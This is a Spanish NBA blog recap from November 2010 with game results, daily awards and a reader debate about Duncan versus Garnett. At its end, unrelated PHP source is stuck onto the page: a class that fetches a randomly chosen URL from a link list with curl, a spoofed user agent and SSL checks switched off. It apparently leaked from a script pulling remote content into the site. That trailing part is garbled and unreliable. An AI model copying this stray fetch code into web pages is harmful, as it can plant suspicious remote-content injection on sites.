La Crónica (03/11/2010)

04 de November de 2010 por TheDeerHunter

Dos grandes y merece la pena empezar por ellos. Paul Pierce anotó el punto 20.000 de su carrera persiguiendo a nada menos que a Bird y Havlicek como los 3 únicos Celtics que sobrepasan esta nada desdeñable cifra. Y al otro lado del país, Kobe Bryant se convirtió en el laker con más minutos jugados de la historia, superando nada menos que a Kareem Abdul-Jabbar. Para los que no lo sepan Kareem se retiró a los 41 años tras 20 temporadas en la liga, la mayoría de ellas en L.A. Sencillamente grandioso.

Entre tanto salta la polémica con otro grande y no precisamente por motivos de celebración. Por lo visto Garnett vaciló a Villanueva comparándolo con el cáncer. El jugador de los Pistons se queja que lo hizo burlándose de su alopecia areata. Un comunicado de Garnett asegura que lo hizo en alusión al patético juego de Villanueva, como cáncer de su equipo y de la liga. Lo peor ya no es un incidente de por sí vomitivo. Lo peor es que hay motivos para creer a Villanueva porque a Garnett ya le conocemos desde hace tiempo. Siempre he defendido que son ese tipo de cosas las que le separaron de llegar a donde Duncan.

Centrándonos en los 12 partidos de anoche, Lakers ganaron sin despeinarse a los Kings (112-100), con triple doble de Kobe (y había quien estaba preocupado por su estado físico) y los Celtics ganaron a los Bucks en la prórroga (102-105). Podrían haber resuelto el partido antes pero inusualmente Allen falló un tiro libre decisivo. Despertaron Ilyasova y Bogut, pero no fue suficiente frente al gran partido de Pierce, Allen, Rondo y adicionalmente de Davis.

Se mantienen sin mácula Hawks (85-94) y Hornets (107-99), a costa de los que no se estrenan, Pistons y Rockets. Sí lo hicieron Sixers sobre Pacers con Brand inmenso (75-101); Bobcats sobre Nets con Diaw de primer espada (85-83) y Clippers sobre Thunder (92-107). ¿Perspectivas excesivas sobre Durant & Co?

Vimos a los Magic endosarle 78 puntos al descanso a los Wolves (86-128). Los “lobitos” tienen tendencia a hundirse antes de la primera parte pero no debe restar méritos a la hazaña y dice mucho del potencial del equipo de Florida. Por cierto, Ryan Anderson pasó a la titularidad con éxito desplazando a Lewis al ala. Fue su mejor partido o su actuación menos mala. Mientras, Pietrus pasó a consideración marginal. No tenemos constancia de ningún problema físico.

Partidazos en Denver con Nowitzki como sólo él sabe estar (102-101) y también en Phoenix que se llevaron los Spurs (112-110). Para lo que se dijo por aquí de Duncan no hace mucho los 25 puntos, 17 rebotes no están nada mal…

Finalmente dos derrotas para los nuestros. Monta Ellis se comió a los Grizzlies de Marc (109-115) y los Jazz no tuvieron piedad de Toronto (108-125). Calderón fatal.

PREMIOS

MVP: Da gusto tener tantos candidatos para el premio más importante de todos. Podríamos elegir entre los 35 puntos y 12 rebotes de Dirk Nowitzki, los 25 puntos (11 de 13) y 17 rebotes de Tim Duncan, los 39 puntos, 9 rebotes, 8 asistencias y 3 robos de Monta Ellis o el triple doble (30-10-12) de Kobe Bryant. Escoged vosotros que a mí me da la risa.

Rookie: Blake Griffin sigue super regular moviéndose siempre cerca del 20-10, pero anoche la figura entre los novatos fue su compañero Eric Bledsoe que guió a su equipo a la primera victoria del año con 17 puntos (7 de 10), 4 rebotes, 8 asistencias y 2 tapones. Buenas noticias para los siempre tristes Clippers.

Sorpresa: No fueron pocos los que se soliviantaron al conocer el buen contrato que los Grizzlies le han firmado en los últimos días a Mike Conley. Anoche el base respondió en la pista: 18 puntos, 7 rebotes, 13 asistencias y 3 robos.

Decepción: Hedo Turkoglu mantiene el “buen” nivel mostrado la temporada pasada. Anoche se quedó en 6 puntos con 2 rebotes, resultando prácticamente intrascendente. Y no es el primer partido ni será el último.

Esfuerzo en vano: Rudy Gay ha empezado la temporada a un nivel altísimo, ganándose de momento cada dólar de su sueldo. Sin embargo, los 35 puntos y 7 rebotes que consiguió anoche no han servido a los Grizzlies para llevarse la victoria.

Comenta

15 comentarios a esta entrada

  1. nacho dice:
    #1

    Rondo MVP que ganas tengo de sentarme a ver a este chico.
    ¿A quién decepciona Hedo? Para que te decepcionen tienes que tener puestas expectativas altas en alguien. ¿Quién las tenía con el turco?

      Citar

  2. nacho dice:
    #2

    Yo las tenía.

      Citar

  3. sergio dice:
    #3

    La actitud de Garnett cada vez es más patética. Creo que deberían sancionarle ejemplarmente… eso si, más en tema económico que en forma de partidos. Ayer mismo, tras el magnífico mate que hizo ante Bogut, estuvo a punto de darle un codazo en la cara al jugador australiano. Cuando el pivot se encaró con él incluso tuvo la desfachatez de hacerse la victima. Este deporte no necesita actuaciones de este tipo. Nada que ver con Duncan… ni siquiera en lo deportivo Deer

      Citar

  4. Busky23 dice:
    #4

    Sorprendente el flojo comienzo de los Rockets,como ha pasado ya en años anteriores creo que alcanzaran su mejor nivel cuando el chino recaiga,paradojas de la vida…
    Enorme comienzo de temporada de Nowitzki,y Kobe a lo suyo,reventando récords con triple-doble para celebraron leyenda viva…
    Sobre el tema Bynum,no cambiaríais vosotros con los ojos cerrados al presidente de cristal de bohemia por Marc???

      Citar

  5. TheDeerHunter dice:
    #5

    En lo deportivo, sergio, ambos son prototipos de los que sale uno cada 100 años. Sus carreras son perfectamente equiparables en lo individual. 21p-12r-3a-2t Duncan… 20p-11r-4a-1.5t Garnett, siendo mejor defensor. La diferencia es más cualitativa que cuantitativa…

    Con Turkoglu… es que no me lo explico. Desde los Kings que me parece un superclase… pero no me esperaba todo lo que dió a Orlando ni el bajón bestial que experimentó cuando llenó el cacito. Yo aún tenía alguna expectativa por la ideosincrasia de Phoenix.

    Y con respecto a Marc sobre Bynum. En condiciones normales Bynum me parece un potencial de top 5 centers. Las dudas son por un problema grave pero concreto. Supongo que está jugándose sus últimas opciones de llegar a ser estrella. De momento aún no lo cambiaría por casi nadie.

      Citar

  6. Tiago dice:
    #6

    Deer, no creo que se puede comparar a Garnett con Duncan y nunca podrá hacerse. Por mucho que KG tenga estadísticas parecidas a las de TD nunca ha sabido ser el lider ganador que a sido Tim. Tuvo que unirse a Pierce y Allen para ganar un anillo mientras que Duncan (siempre bien rodeado) fue el lider indicutible en los 4 anillos que tiene en su manita.

    Jefferson me está callando la boca, y a lemontus también.

      Citar

  7. sergio dice:
    #7

    Duncan nunca le ha ganado un enfrentamiento directo en Playoffs a Duncan Deer… y eso que ha contado en su equipo con Spreewell y Cassell. Tim hacia lo que tenia que hacer siempre dentro de la cancha y Garnett lo intentaba hasta por metodos poco o nada ortodoxos. Y tampoco considero a Garnett mejor defensor que Duncan. Simplemente uno es mas versatil y otro mucho mas inteligente. Pero que vamos.. que solo hablaba de lo estupido que es Garnett en muchas ocasiones… y que es uno de los motivos de que no se le ponga mucho más arriba. Creo que ha perjudicado más su juego que favorecerle. En ocasiones he visto como ha sido él el que se ponía demasiado tenso en lugar de su contrincante.

      Citar

  8. TheDeerHunter dice:
    #8

    No estoy de acuerdo con lo que decís. Matizo: sí en lo de que su inteligencia ha influido en su juego y era a eso a lo que me refería. Su actitud está intrínsecamente relacionada con su inteligencia. Podemos llamarlo como queráis.
    En lo demás… claro que tuvo que irse junto a Pierce y Allen para ganar. No comparemos los Wolves por mucho Cassell y Sprewell que mencionas (con Trenton Hassell y el paquetísimo de Olowakandi de titulares en los mejores momentos, cuidado) con lo que ha tenido Duncan alrededor. Eso es lo único en lo que no les podemos comparar deportivamente.
    Me hubiera gustado ver a mí a Duncan ganar una serie junto a Sam Mitchell, Malik Sealy, Nesterovic, Dean Garrett, Peeler… contra los Spurs de Robinson, Mario Elie, Sean Elliott, Avery Johnson, Antonio Daniels, Malik Rose junto a Garnett… sino me equivoco fue la única ocasión que tuvieron de medirse.

      Citar

  9. Txusma dice:
    #9

    O Nacho tiene un trastorno de personalidad o ya estamos liándola otra vez…
    Sobre el Turko yo ya digo q no tenía ninguna esperanza sobre él y que no la tenía ya cuando lo traspasaron a los Raptors. Si el año pasado se habló que a Turkoglu no le iba nada bien jugar al lado de un base-base como Calderón, que podíamos esperar de jugar al lado de Nash? Tb pretende ordenar él el juego ofensivo? Para mi cagada de los Suns fichandolo…
    Y el problema de los Rockets es que tienen que jugar de 2 formas ultradiferentes. Cuando está Yao todo ha de ser más pausado y quieras que no, se convierte en la referencia atacante. En cambio cuando no está se trata de correr, que es lo q le mola a Aaron Brooks y casi al resto de los jugadores. Es muy dificil jugar bien si tienes que aprender a hacerlo de 2 maneras. Si se lesiona el chino mejorarán seguro pq ya se pueden concentrar en un solo estilo, pero eso no quiere decir que la culpa sea precisamente de Yao, que por cierto, se está recuperando bastante bien.

      Citar

  10. troll dice:
    #10

    Los Suns se han enterrado a ellos mismos de manera penosa…y aun hay gente que les da plat

      Citar

  11. HisRoyalAirness dice:
    #11

    Suscribo lo que dice Deer de Duncan/Garnett aunque sí soy de la opinión de que el saber estar, el respeto y la sensatez son fundamentales en un deportista y pueden influir positivamente en el rendimiento a corto y a largo plazo. No se debe confundir la seguridad en uno mismo con la arrogancia, cosa que lleva haciendo KG toda su puñetera vida.

    Y una cosa ¿alguien se ha olvidado de que Bynum tiene 24 años? Un chaval de esa edad con ese tamaño, esos fundamentos y esa experiencia en la liga es impagable, al menos desde mi punto de vista. Marc es buenísimo y tiene aún margen de mejora pero Andrew también.

      Citar

  12. McNulty dice:
    #12

    total acierto el enlazar el boxscore de los partidos junto al resumen del blog…

      Citar

  13. Denise dice:
    #13

    El problema de Bynum son las lesiones, no su carencia de fundamentos.
    Suscribo lo dicho por Txusma, los Rockets juegan mejor sin el chino.

      Citar

  14. kantonyo dice:
    #14

    A veces no entiendo cómo, (por culpa de unos y otras veces por culpa de otros, me incluyo yo) enterramos tan rápido a jugadores de la talla de Duncan, Yao Ming, Garnett e incluso otros de buen nivel como Jefferson, Odom, Pierce, Carter o Lewis.

    Creo que deberíamos ser un poco más prudentes para afirmar que Duncan está acabado o que los Rockets jugaran mejor sin el chino, o que Odom ya no vale ni recoge-pelotas.

    En el caso de Duncan, cuando leo eso y miro las estadisticas y veo que promedia 17 puntos con un 64% en tiros de campo, 11 rebotes y 25 de Eficiencia en sólo 31 minutos, alucino!!!

    Por otra parte, Yao Ming es una pieza fundamental en las aspiraciones de Rockets. No creéis que es de bastante merito volver después de una grave lesión y promediar 13 puntos, 7 rebotes, 15 eff en sólo 21 minutos. Es un promedio de 23 puntos, 12 reb, 26 eff en 36 minutos.

      Citar

  15. sergio dice:
    #15

    Deer, Duncan le ganó a Garnett 2 eliminatorias: la de 2000-01 y la de 98-99. Ambas primeras rondas si no me equivoco. Y no creo que en aquellos años hubiese tanto diferencia de equipos entre ambos (con un viejo Robinson aparte). Quizás simplemente recuerdes a unos jugadores como parte de equipos campeones y a otros como jugadores que no llegaron a pasar a la historia. Lo que diferencia a Duncan de otros muchos jugadores es el saber sacar partido de su inteligencia y crear con ella superioridades mucho mas grandes que si dependiese de su fisico.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>